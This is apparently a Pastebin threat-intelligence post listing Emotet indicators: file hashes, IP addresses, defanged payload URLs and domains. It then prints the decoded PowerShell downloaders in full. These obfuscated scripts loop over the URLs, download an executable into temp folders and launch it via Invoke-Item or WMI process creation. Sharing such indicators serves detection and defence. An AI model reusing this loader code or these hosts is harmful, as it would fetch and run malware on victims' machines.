Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- SHA256:
- 40dfd40fd3c52f25193b940453a50e1102ef1318ee824639fd29957d8c9d3c9a
- ddc0b4a6a21a497ce6131407914c6bd00b1080f8f195a970c0ce2314a1c6cac0
- 1ed6c70d9db5647fe2f890dc49a5969ba527a573f145da494497cb82bde38d39
- 6efb916faef60ea0d4799e040975dc4ffdef08bb0aa5b15385f0bf6fbf426407
- 2fea8b7f5754e42358ec1079c8f5995e1e733153af5101e3c786980aad17824d
- 57ee417cb3400d780d2ce67d7c9aab2ad85b432ff2f414d1844d395a4d8992b3
- cb90272c314a4f1fa20fc87b07f4616d810102f4afe3dbd7f260eb9cdac00f8f
- 6bfb56b285ed97664a586743af9ec1bec72255af2731174be05a1236883b0129
- a848bea60e6257d01e25d7ca5944a9781c123fba443b5de6b84f20a9599a53f1
- f90d3c222ccffad10a3ef4d79bd050360045d683c9a1610f7f70b75291a61d8b
- 94e5a6b8f34d974325965d03b024b0a8beab2d2b69710c571643586de555727e
- 7955dfdb89d471adb7751d49e7cd02473936b90ef8ed1e87d43f29a1945db8ab
- 3b87b742002b973d033d06a0392bcebfb3073fae103e48cc81f1d57b55e92525
- 3aa5f65cd6e68ee14b50cfd4c02d1ea4ee67196bcda382d14ae41cad884461de
- 3c4afdb13944ec108a4df3e7c055e82947fa70961ecc0029971204108da7ae7b
- ebab708f03ee6f65f5d74463903c11d08108d9b335a01b1c504fb44a337b7ef7
- 8497faf7956deca580f40179c41fa928c0a810d44b9522acf54d00062baefad7
- 341e9a1b4252cc46eaaf7518c4a09a3f4caea692bb29798760dbc23601731ca5
- 86c72a65b1735618b61ec33aa50fb2e32bc48a0d90a292a414d5d687f4ff580d
- d264878eae29d3da022f38e67a38560346ba42cbb6dbebbf0e6c852c666fb1ac
- 3cfd7d5452d330e27f670313792a40a4a67ac6480e162313f408b4e53582f631
- f81e4de8069e9551180db92af779f1c19f7bfef0dde8f9696ae0b242d3fb8f2d
- 493fbab43b8eaf0772394866842fa9474e8e54a84894498828af06590dff1cbd
- 5efa2b73134b720b789e7a0ae1798e3a491be917db79092a8f0cb6bbcaa759d3
- edb2d0b8c8a23dd9b734215054477b38a7e623586ee26535725415d3e9fc0a69
- d48ae5457d3cb5fa376e574a9bc66b5e43b6ef5cf54febbd7b4d23357826435c
- 6e4be99b94c2186dba5fd19c6a73c7396cfb050c6bfd1e7b15853913eaa25790
- c95c38c762b20a9a783e21bec9d1b93ed8abfbfe11350447b87875396f06abd9
- a4bb87f70485b94552892dc632dca86767dbc62da4e55db7861d9679926eee5b
- 4d3053d9bac3a76162c8e96a951412ba99d5dbc0d6a1feb36b49db1b50f1b7f6
- 97606dbedb8ab3acf375ef7c84f2ffe377af685a7539770967d1a36cb5dbf752
- 731e691b6611bd3b3f49873097fcd5f5f7ffa5524242cba77e04f0cd1011d106
- 4564887cac06e653978a7c338631202fd4835bcca720e345d56cc0a8507ac1f9
- be55a09daaa90acd0c26dc0ef106015fcf2a568cfa978ef2c5100496490bf16b
- bc180b0be3256cf4ec6a9efda2f8a29d78c86e5629a9ed13157cb27743756087
- 5a98792e4de10c9cc05bc756368773f9508680e67448b7185d3906959f288805
- c16ff0992cfed0a759745ba24ecf817ccc18b85167223727f0a4060b302269ef
- d18b82df0184f35eb170be8177238aa8237ad55cf40a7a0ddcf3aa0ac63b9763
- 176034f1b8e8a8954b0b305a5473045f0616ce4615fa92bbc6e201d58c12b661
- 661afae9cedb766f0717b71057f1e5ed0e6196f949dfc7c2d44224f77b6e42e4
- d88ad8af3cdc4ade883d0afff8c98114ac25e6619b3334d3a51a12b4455d3734
- a47f7f73a3a913fa2748392e89473be12a79dc697133b51fbb0fd287b5ec4e72
- a52f03c02f09f5b7362e30e2631038dd6abc12048d37f97745f7d295fc8b6f94
- 7e52a1a707309d4bcc67f4d66745d5f7635d12ea6a4edd6a69cf52cc34b51414
- 0efb0955bee11a298cc083ff5d5efad51e7d780135bb4783beed690dadc28bb1
- e85ba8d9310dae4ec14642c36c11ffba802eb88af51a5b9302f13f7e006d56e3
- 1df9df819ad7c5cd36928c1cc5f000a9bd5ef7521a4d75b2eb3dbed61e08272a
- c24383a38bc551ab44546118aae0103bee945e1973a2273948e1b7c872a13dbd
- d38d742aac9e7e8163883c02f3d9a04a485c059f0b52846fca23571c36941191
- d4cbd06c243f6df3e9a29acc56638f3fcfc3a8acf866c600458d002824902762
- 67dddcb1b872cf27b06e1c1bbe1142f2b104e7b2abeb600188bb929648cb8e5c
- ff0ebab531232f9ae8d5b2ad78ace8848adffedec41de03b8676c956c14c6015
- caf6516eb4a4a757d7e22374ff6ec4fa6a4336aca97714c77ffd3c264a4a0309
- 04b8d99bb7e4aea164206088cbea57c4d7477d0b1f417d104ff8f05470a10a15
- 39ab82b299fe466e775d32f90ca2f59b3d3d1aa1d3b17000b5995f26f07f774d
- 9653845487d1b3c5f4a30493f9a0df6df6f9f50677748425b87c6a9480793d45
- 7606382de0ca46783167f6b493b98e3f67c8858a91683cb57995239e03514285
- 21a313bc3b7b33c49abbc4eff7e08f212b15c5247ea9a8fce5320ae77172c526
- a302a49cafa48ab0b8d686124f89eb0517a014f31fcb5dc4eb8b574854fbc0c8
- b43c1e041bad2db23e5b14ed9fedafb40c6c42a3af0d3124953e2984b06f9038
- cf4de1b852a28193190bb1a8ec3d48ba28bdcc7aad6bd67944cae6e15cef53cf
- 8906500d2bf022e69b9f3b29388d2b7a8e398d127d023c7aeb6eb2d399fa0693
- be9508b06ac529e53e81f008999cc6ddfc0402beb7506e6094c0d8bdacfafb55
- 8ee5aae6fb9d81c6a4e85f924675fe62f29639141ad7911eeeb96d7cf26ceee9
- 52b6c67df2a895a98d3cde7dd664e2fa6ccf834e9efe8ce45666b2cf3ef79594
- IPs:
- 103.129.98.47
- 103.139.3.19
- 103.233.25.209
- 104.18.61.2
- 104.24.96.193
- 104.27.148.20
- 104.27.149.20
- 104.27.176.16
- 104.27.177.16
- 104.31.64.119
- 107.180.47.3
- 107.180.47.4
- 107.180.57.91
- 112.213.89.126
- 117.78.27.128
- 13.232.244.117
- 142.11.239.9
- 148.66.136.52
- 149.255.62.8
- 154.16.119.127
- 154.219.173.66
- 160.153.47.32
- 162.241.156.188
- 172.67.137.58
- 172.67.219.99
- 177.185.194.162
- 177.185.196.31
- 177.185.206.82
- 178.210.75.228
- 186.64.114.45
- 186.64.114.85
- 186.64.118.165
- 191.6.205.100
- 191.6.208.15
- 192.185.5.43
- 198.252.99.131
- 198.71.233.9
- 206.225.86.233
- 216.37.42.40
- 31.31.198.12
- 3.219.21.58
- 3.23.199.247
- 34.75.142.181
- 47.112.152.109
- 64.37.60.39
- 68.183.158.235
- 69.46.6.238
- 69.64.57.24
- 77.105.36.132
- 81.88.52.104
- 83.166.151.246
- 84.246.212.141
- 88.218.116.196
- 94.237.78.68
- 98.102.204.206
- URLs:
- hxxps://harugomnhat.mizi.vn/lfv9u/Yc31L165329/
- hxxp://betmagik.com/wp-includes/e6eT18030/
- hxxp://aofortunes.com/9gipx/wOOY59/
- hxxp://yourman.co.uk/hWftFfZpx/uRkkm0115/
- hxxps://serenitynailsfranklin.com/wp-includes/OU50007/."S`PLiT"([char]42);
- hxxp://exam.panalearning.com/pana/e/
- hxxp://www.interibericos.com/data/S/
- hxxp://www.mcsgroup.co/multifunctional_resource/J/
- hxxp://pcantivirusnumber.com/wp-includes/N7/
- hxxp://bluetechprism.com/css/o/
- hxxp://familiachickenargentina.com/cgi-bin/0/
- hxxp://todaymailbox.com/cgi-bin/QrR/)."s`pLiT"([char]42);
- hxxp://cryptokuota.com/assets/ayQUtnd403/
- hxxp://fgajardo.com/pruebas/iTfVzJiNG/
- hxxps://www.pharma-israel.org.il/wp-content/oJSUC/
- hxxp://popweb.com.br/remedios/QUSArASDIIdPz/
- hxxp://megasolucoesti.com/R9KDq0O8w/mg7e129370/
- hxxp://idealli.com.br/journal/lhaci5i5315/
- hxxp://airmaxx.rs/MbKoqsSL/)."S`plit"([char]42);
- hxxp://muliarental.com/wp-includes/uwr_u4_ed3qzbb/
- hxxp://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/
- hxxp://my6thgen.org/_db_backups/t_e_v7qizcr2/
- hxxp://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/
- hxxp://www.naayers.org/Library/o_eo_97ml/."SPl`iT"([char]42);
- hxxp://www.luxelistreviews.com/wp-includes/AYR/
- hxxps://www.yhyhzx.com/wp-admin/pKpz/
- hxxp://mediadrive.nichost.ru/awfcatfre/9thw57489/
- hxxp://kumarpratham.com/fonts/Wtuq/
- hxxp://fxea.club/wp-includes/mPqJMPzx/
- hxxps://xiangfu.phjrt.com/0qeoy/voB355f13v2j475/
- hxxps://www.batamry.com/tmp/baeng79095371/)."Spl`IT"([char]42);
- hxxps://alameenmission.net/cgi-bin/Ju1r8t/
- hxxps://www.altopropiedades.cl/fonts/AWM/
- hxxp://anisoph.com/cgi-bin/u95B/
- hxxp://identisoft.pt/istore/7U/
- hxxp://b3shop.net/calendar/nnxakTd/
- hxxp://nourishmentjuices.com/wp-content/e/
- hxxps://en.entechco.com.vn/wp-includes/9XMEI7/)."S`PLIT"([char]42);
- hxxp://chendo)n(ghui.cn)/w(p-co)(ntent/Z/
- hxxp://mathisprost.lu/wp-admin/EjNkLlwjGEk/
- hxxp://www.mexpresscargo.com/apmbh/uEJLd4i3b12/
- hxxp://facanha.com.br/temp/XVmDFA/
- hxxp://www.dougsuniverse.com/pics/VzC1ngzg67686813/
- hxxp://admvero.com.br/minhaagua/fmeogbIkCT/
- hxxps://itisfuture.com/wp-content/Zg21h52700782/
- hxxps://alameenmission.net/data_backup/fSQiDxHCGysYT/)."S`PlIt"([char]42);
- Domains:
- harugomnhat.mizi.vn
- betmagik.com
- aofortunes.com
- yourman.co.uk
- serenitynailsfranklin.com
- exam.panalearning.com
- www.interibericos.com
- www.mcsgroup.co
- pcantivirusnumber.com
- bluetechprism.com
- familiachickenargentina.com
- todaymailbox.com
- cryptokuota.com
- fgajardo.com
- www.pharma-israel.org.il
- popweb.com.br
- megasolucoesti.com
- idealli.com.br
- airmaxx.rs
- muliarental.com
- ltrybus.com
- my6thgen.org
- mywebnerd.com
- www.naayers.org
- www.luxelistreviews.com
- www.yhyhzx.com
- mediadrive.nichost.ru
- kumarpratham.com
- fxea.club
- xiangfu.phjrt.com
- www.batamry.com
- alameenmission.net
- www.altopropiedades.cl
- anisoph.com
- identisoft.pt
- b3shop.net
- nourishmentjuices.com
- en.entechco.com.vn
- chendo)n(ghui.cn)
- mathisprost.lu
- www.mexpresscargo.com
- facanha.com.br
- www.dougsuniverse.com
- admvero.com.br
- itisfuture.com
- alameenmission.net
- Decoded Base64 Powershell:
- $E6q99jv=Gi1h557;
- [Net.ServicePointManager]::"S`e`cU`RiTyPRotocOl" = tls12, tls11, tls;
- $U1ug2ud = Nmdj;
- $Bp_6i6_=V4nz2s8;
- $Kdv295r=$env:temp\$U1ug2ud.exe;
- $K7zfs_s=Ck005bz;
- $Jl23oxf=.(new-object) nET.wEbCLieNT;
- $Rzx3ro0=hxxps://harugomnhat.mizi.vn/lfv9u/Yc31L165329/
- hxxp://betmagik.com/wp-includes/e6eT18030/
- hxxp://aofortunes.com/9gipx/wOOY59/
- hxxp://yourman.co.uk/hWftFfZpx/uRkkm0115/
- hxxps://serenitynailsfranklin.com/wp-includes/OU50007/."S`PLiT"([char]42);
- $F4z36v1=H53q6ar;
- foreach($G5jdj54 in $Rzx3ro0){try{$Jl23oxf."downl`o`ADF`ILe"($G5jdj54, $Kdv295r);
- $Yrewqh4=Xk297a9;
- If ((.(Get-Item) $Kdv295r)."LE`Ng`Th" -ge 36019) {.(Invoke-Item)($Kdv295r);
- $Tr95fu4=P7yhc6c;
- break;
- $Rbm9cg_=P6v63hj}}catch{}}$Zmeutr4=Hr6mf76$Fvu_sp2=(A9ic1n8);
- &(new-item) $ENV:tEmP\OffIcE2019 -itemtype DIrEcToRY;
- [Net.ServicePointManager]::"SeCURi`T`yPro`T`OcoL" = (tls12, tls11, tls);
- $Gcsz806 = (Svwgqk);
- $Hcecvx1=(Mq4880r);
- $Afej916=$env:temp(({0}Office2019{0})-f [cHar]92)$Gcsz806(.exe);
- $Ppgjas4=(Xfj_mny);
- $Tgmwmvt=&(new-object) net.WeBclient;
- $A9rlxeo=(hxxp://exam.panalearning.com/pana/e/
- hxxp://www.interibericos.com/data/S/
- hxxp://www.mcsgroup.co/multifunctional_resource/J/
- hxxp://pcantivirusnumber.com/wp-includes/N7/
- hxxp://bluetechprism.com/css/o/
- hxxp://familiachickenargentina.com/cgi-bin/0/
- hxxp://todaymailbox.com/cgi-bin/QrR/)."s`pLiT"([char]42);
- $Yzj9ong=(I_1w9q_);
- foreach($Mllessq in $A9rlxeo){try{$Tgmwmvt."Do`wnLo`Ad`FiLE"($Mllessq, $Afej916);
- $Gla3ja7=(Grfpn1w);
- If ((.(Get-Item) $Afej916)."LEN`g`Th" -ge 22387) {.(Invoke-Item)($Afej916);
- $S0izu7h=(W9a4h1q);
- break;
- $Z1bn759=(My8h30v)}}catch{}}$P5ir3vz=(Utod6_c)$Gzuprpf=(Nc45xy8);
- &(new-item) $eNv:temp\oFFIce2019 -itemtype dIrecTory;
- [Net.ServicePointManager]::"seCU`RI`TYPRo`TocOL" = (tls12, tls11, tls);
- $Uukttua = (R_o2c8hj4);
- $Zh11xjz=(E08ma9i);
- $Jo0nogv=$env:temp((tS5Office2019tS5)-CRePlacE tS5,[cHAR]92)$Uukttua(.exe);
- $Wln3fex=(Wufjmnr);
- $Joq2eak=&(new-object) nET.WEBCLiEnT;
- $Lo733aj=(hxxp://cryptokuota.com/assets/ayQUtnd403/
- hxxp://fgajardo.com/pruebas/iTfVzJiNG/
- hxxps://www.pharma-israel.org.il/wp-content/oJSUC/
- hxxp://popweb.com.br/remedios/QUSArASDIIdPz/
- hxxp://megasolucoesti.com/R9KDq0O8w/mg7e129370/
- hxxp://idealli.com.br/journal/lhaci5i5315/
- hxxp://airmaxx.rs/MbKoqsSL/)."S`plit"([char]42);
- $Qoq953p=(D1s9bm0);
- foreach($V1lqyq2 in $Lo733aj){try{$Joq2eak."DOwn`Loa`DFIle"($V1lqyq2, $Jo0nogv);
- $Nxb87b8=(On6ddpv);
- If ((.(Get-Item) $Jo0nogv)."lE`NgTH" -ge 36397) {.(Invoke-Item)($Jo0nogv);
- $P1wslwd=(Vypxzlu);
- break;
- $S31lvpv=(Pnr9mrz)}}catch{}}$Rqqwn0h=(Z_corh7)$IQYJUppm=WKOYOzwu;
- [Net.ServicePointManager]::"sEC`U`Ri`TYPRoT`ocOl" = tls12, tls11, tls;
- $FYOFEndz = 659;
- $IWRGHkts=TFYCSgbk;
- $VXKIXdhc=$env:userprofile\$FYOFEndz.exe;
- $LDUTLrks=GJPIKwzq;
- $QGQZAtqo=&(new-object) nEt.WEbCLient;
- $RUUNJyzq=hxxp://muliarental.com/wp-includes/uwr_u4_ed3qzbb/
- hxxp://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/
- hxxp://my6thgen.org/_db_backups/t_e_v7qizcr2/
- hxxp://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/
- hxxp://www.naayers.org/Library/o_eo_97ml/."SPl`iT"([char]42);
- $RKRZAxqs=YHVSNowi;
- foreach($YJLGSrkb in $RUUNJyzq){try{$QGQZAtqo."dOwn`L`oad`FiLE"($YJLGSrkb, $VXKIXdhc);
- $JPLAVojm=IKUCCcsk;
- If ((&(Get-Item) $VXKIXdhc)."LEnG`TH" -ge 20603) {([wmiclass]win32_Process)."Cre`Ate"($VXKIXdhc);
- $MCXCTkml=OVBMCiqa;
- break;
- $QOCQNnih=VETADnow}}catch{}}$LMSPIdey=HYSTMbpt$Mrr31m_=(Vysd7kk);
- .(new-item) $eNv:tEmp\offiCE2019 -itemtype dIREctory;
- [Net.ServicePointManager]::"Se`c`U`RiTY`PROt`OcoL" = (tls12, tls11, tls);
- $Fjqkw_l = (C3bc3av5i);
- $L7k7j7g=(Fxgw34m);
- $Dl5edc6=$env:temp(({0}Office2019{0}) -F [chAR]92)$Fjqkw_l(.exe);
- $Hpu2g9_=(E59ihr7);
- $Lrigowf=&(new-object) net.wEbcLient;
- $Xcnye2g=(hxxp://www.luxelistreviews.com/wp-includes/AYR/
- hxxps://www.yhyhzx.com/wp-admin/pKpz/
- hxxp://mediadrive.nichost.ru/awfcatfre/9thw57489/
- hxxp://kumarpratham.com/fonts/Wtuq/
- hxxp://fxea.club/wp-includes/mPqJMPzx/
- hxxps://xiangfu.phjrt.com/0qeoy/voB355f13v2j475/
- hxxps://www.batamry.com/tmp/baeng79095371/)."Spl`IT"([char]42);
- $Oo9e89o=(X8dxwra);
- foreach($Ws0zexn in $Xcnye2g){try{$Lrigowf."doW`N`LoAD`FILe"($Ws0zexn, $Dl5edc6);
- $Te1fjrf=(Xxzq993);
- If ((.(Get-Item) $Dl5edc6)."Len`g`Th" -ge 34409) {&(Invoke-Item)($Dl5edc6);
- $Ncn7i2n=(Y6j6mb1);
- break;
- $Ssd22nc=(Liki0z0)}}catch{}}$J8dpyns=(Jemx7xu)$Nx5uktw=(Hss2_s4);
- &(new-item) $ENV:TEmp\OfFicE2019 -itemtype DiRecTORy;
- [Net.ServicePointManager]::"SEc`URIt`yPR`OToCOL" = (tls12, tls11, tls);
- $Zs3iyv3 = (Uirxlt7t);
- $R5r12dq=(Eopn7tv);
- $Cm8trm1=$env:temp(({0}Office2019{0})-f [cHAR]92)$Zs3iyv3(.exe);
- $Zi_5_ws=(Cppdfy_);
- $Wicv0ib=&(new-object) nEt.webclieNT;
- $Vdj5_s0=(hxxps://alameenmission.net/cgi-bin/Ju1r8t/
- hxxps://www.altopropiedades.cl/fonts/AWM/
- hxxp://anisoph.com/cgi-bin/u95B/
- hxxp://identisoft.pt/istore/7U/
- hxxp://b3shop.net/calendar/nnxakTd/
- hxxp://nourishmentjuices.com/wp-content/e/
- hxxps://en.entechco.com.vn/wp-includes/9XMEI7/)."S`PLIT"([char]42);
- $Hgxzfht=(Bb4enl8);
- foreach($Brg8bgp in $Vdj5_s0){try{$Wicv0ib."dOWN`LO`ADFilE"($Brg8bgp, $Cm8trm1);
- $X9nk8zn=(I3xmymv);
- If ((&(Get-Item) $Cm8trm1)."l`eNg`Th" -ge 30065) {&(Invoke-Item)($Cm8trm1);
- $Rcz87u3=(P404nm4);
- break;
- $Thhlz5x=(Onnvg21)}}catch{}}$H1zjh3a=(Pvm8pk0)$Q4uhf4q=(R3up(buc));
- &(new-item) $env:temP\WoRd\2019\ -itemtype dIReCTORY;
- [Net.ServicePointManager]::"SECuRitY`P`R`oTOcoL" = (tl(s12)(, tl)(s11)(, tls));
- $Bm8fcn9 = (D(3v9)3m);
- $L_runu6=((V4a)8(8l1));
- $R0nzdqu=$env:temp(((flMwo)(rdfl)(M2019flM))."REpL`A`CE"(([chAR]102[chAR]108[chAR]77),[StRing][chAR]92))$Bm8fcn9((.ex)e);
- $Ws2am7e=(Mk(zbk3_));
- $Cb9j7fa=&(new-object) NeT.wEBcLiEnT;
- $Wu6w1qa=((hxxp):/(/thestratums)(phe)(re.)(com/wp-admin/wODL/
- ht)(tps://tmlsc)(onsu)(ltin)(g.c)(om/abay)/RI/(
- hxxps:)/(/is-y)(ap.com/w)p(-admin/AA7/
- hxxp://chendo)n(ghui.cn)/w(p-co)(ntent/Z/
- hxxp):/(/ve)(terina)ri(apetl)(ife.)(cl/4)br(/AX)(C5/
- )(hxxp:)//(blueseaspor)(ts.c)(om/iv/
- ht)(tp://we)bdemo(.cl)/(clm)(d/hVf)/)."S`plIt"([char]42);
- $Hxdizjd=((Vs1xay)f);
- foreach($F1hsz78 in $Wu6w1qa){try{$Cb9j7fa."d`OwnLOA`dfIlE"($F1hsz78, $R0nzdqu);
- $K32qbl5=((Wecd7)5_);
- If ((.(Get-Item) $R0nzdqu)."l`E`NgTh" -ge 21406) {&(Invoke-Item)($R0nzdqu);
- $Pwkismw=((Rh5f)(rl5));
- break;
- $Uwtbun_=((Nnu)(g_g)a)}}catch{}}$Q6pc7y9=((Dbnd)apn)$Ross7z1=(Qeuvqmy);
- .(new-item) $Env:TemP\oFfiCE2019 -itemtype dIrECToRy;
- [Net.ServicePointManager]::"s`E`c`URIt`YProtOcOl" = (tls12, tls11, tls);
- $Xss8gv4 = (Qwe8qg);
- $P6d8649=(Nrqjol4);
- $Mrfq_y6=$env:temp(({0}Office2019{0}) -F[cHAr]92)$Xss8gv4(.exe);
- $U2646ek=(O6pjvr7);
- $W9zvoww=.(new-object) NET.WebCLient;
- $G1k4mk5=(hxxp://mathisprost.lu/wp-admin/EjNkLlwjGEk/
- hxxp://www.mexpresscargo.com/apmbh/uEJLd4i3b12/
- hxxp://facanha.com.br/temp/XVmDFA/
- hxxp://www.dougsuniverse.com/pics/VzC1ngzg67686813/
- hxxp://admvero.com.br/minhaagua/fmeogbIkCT/
- hxxps://itisfuture.com/wp-content/Zg21h52700782/
- hxxps://alameenmission.net/data_backup/fSQiDxHCGysYT/)."S`PlIt"([char]42);
- $Nq8y437=(Skbd_dj);
- foreach($Ck7935l in $G1k4mk5){try{$W9zvoww."do`wNL`Oad`FiLE"($Ck7935l, $Mrfq_y6);
- $Vomgvnd=(Onn_nyj);
- If ((&(Get-Item) $Mrfq_y6)."len`gTH" -ge 20712) {&(Invoke-Item)($Mrfq_y6);
- $N10pfpa=(Jdudh2q);
- break;
- $Rpgf1nf=(Ldpp7fb)}}catch{}}$Zssnllz=(Iliktnn)
Add Comment
Please, Sign In to add comment